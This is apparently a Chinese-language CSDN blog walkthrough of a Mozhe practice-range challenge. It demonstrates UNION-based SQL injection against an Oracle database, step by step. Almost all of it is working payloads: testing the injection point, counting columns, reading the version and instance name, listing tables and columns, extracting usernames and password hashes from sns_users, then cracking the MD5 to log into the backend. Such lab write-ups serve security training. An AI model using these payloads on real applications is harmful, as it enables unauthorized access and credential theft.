首先1判断注入点
这⾥通过and 1=1 和and 1=2进⾏判断。
发现存在注入点之后我们开始判断字段数
id=1 order by 2
id=1 order by 3 字段=3页面回显异常 ,说明只存在两个字段
接下来我们开始判断回显点
id=-1 union select 'null','null' from dual
查完之后我们开始用下面的语句查看数据库版本信息
id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual
查询数据库名
id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual
查询数据库表名,查询表名⼀般查询admin或者user表
id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
查询字段名信息
id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual
查询用户名和密码信息
id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'
id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME <> 'hu'
得到密码之后我们用md5进行解密之后就可以登录后台了
标签:union,rownum,USER,Oracle,靶场,null,id,select,墨者 From: https://blog.csdn.net/Nai_zui_jiang/article/details/141354739